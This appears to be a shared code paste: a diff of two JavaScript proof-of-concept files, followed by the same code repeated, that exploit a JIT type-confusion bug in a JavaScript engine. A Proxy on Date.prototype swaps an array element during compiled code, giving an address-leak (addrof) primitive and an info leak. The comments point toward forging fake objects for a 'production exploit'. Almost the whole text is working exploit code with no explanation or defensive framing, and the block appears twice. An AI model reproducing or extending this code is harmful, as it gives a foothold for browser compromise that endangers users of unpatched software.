ur0 · August 8, 2019 05:23
diff --git a/pepsiPoc.js b/pepsiPoc.js
 load("utils.js")
 load("int64.js")

 function addrof(obj) {

    let dateObj = new Date();
    dateObj[0] = 1;
    let array = new Array(13.37, 13.37)
    let triggerChange = false;
    Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {
        has: function () {
            if (triggerChange) {
                array[1] = obj
            }
        }
    });
    function changeElement(localArray, localDateObj, floatArray) {
        localArray[0];
        let avoidRemoval = 1 in localDateObj;
        floatArray[0] = localArray[1];
        return avoidRemoval;
    };
    let u32 = new Uint32Array(2);
    let f64 = new Float64Array(u32.buffer);
    for (let i = 0; i < 50000; i++) changeElement(array, dateObj, f64);
    triggerChange = true;
    changeElement(array, dateObj, f64);
    return u32[0] + (u32[1] * 0x100000000);
 }
 let x = {a: 1}
 print(addrof(x).toString(16))
diff --git a/poc.js b/poc.js
 let s = new Date(); //date
 let confuse = new Array(13.37,13.37); //make array
 s[0] = 1; //date array
 let hack = 0; //toggle hack
 Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {has: function() {
    if (hack) {
 //        alert("side effect");
        confuse[1] = {};
    }
 }}); // this doesn't trigger type conversion of |s| into SlowPutArrayStorage

 function victim(oj,f64,u32,doubleArray) {
    doubleArray[0];
    let r = 5 in oj;
    f64[0] = f64[1] = doubleArray[1];
    u32[2] = 0x41414141;
    u32[3] = 0;
    // u32[2] += 0x18; < you'd use this for an actual production exploit in order to get a fake object rather than using 0x41414141
    doubleArray[1] = f64[1];
    return r;
 }

 let u32 = new Uint32Array(4);
 let f64 = new Float64Array(u32.buffer);

 for(let i=0; i<50000; i++) victim(s,f64,u32,confuse); // JIT compile
 hack = 1;
 victim(s,f64,u32,confuse);
 if (u32[1] === 0x7ff80000) {
    print("failed");
 }
 print("infoleak: " + f64[0] + " (hex: 0x" + (u32[0]+u32[1]*0x100000000).toString(16) + ")");
 confuse[1][0];
	load("utils.js")
	load("int64.js")

	function addrof(obj) {

	let dateObj = new Date();
	dateObj[0] = 1;
	let array = new Array(13.37, 13.37)
	let triggerChange = false;
	Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {
	has: function () {
	if (triggerChange) {
	array[1] = obj
	}
	}
	});
	function changeElement(localArray, localDateObj, floatArray) {
	localArray[0];
	let avoidRemoval = 1 in localDateObj;
	floatArray[0] = localArray[1];
	return avoidRemoval;
	};
	let u32 = new Uint32Array(2);
	let f64 = new Float64Array(u32.buffer);
	for (let i = 0; i < 50000; i++) changeElement(array, dateObj, f64);
	triggerChange = true;
	changeElement(array, dateObj, f64);
	return u32[0] + (u32[1] * 0x100000000);
	}
	let x = {a: 1}
	print(addrof(x).toString(16))
	let s = new Date(); //date
	let confuse = new Array(13.37,13.37); //make array
	s[0] = 1; //date array
	let hack = 0; //toggle hack
	Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {has: function() {
	if (hack) {
	// alert("side effect");
	confuse[1] = {};
	}
	}}); // this doesn't trigger type conversion of \|s\| into SlowPutArrayStorage

	function victim(oj,f64,u32,doubleArray) {
	doubleArray[0];
	let r = 5 in oj;
	f64[0] = f64[1] = doubleArray[1];
	u32[2] = 0x41414141;
	u32[3] = 0;
	// u32[2] += 0x18; < you'd use this for an actual production exploit in order to get a fake object rather than using 0x41414141
	doubleArray[1] = f64[1];
	return r;
	}

	let u32 = new Uint32Array(4);
	let f64 = new Float64Array(u32.buffer);

	for(let i=0; i<50000; i++) victim(s,f64,u32,confuse); // JIT compile
	hack = 1;
	victim(s,f64,u32,confuse);
	if (u32[1] === 0x7ff80000) {
	print("failed");
	}
	print("infoleak: " + f64[0] + " (hex: 0x" + (u32[0]+u32[1]*0x100000000).toString(16) + ")");
	confuse[1][0];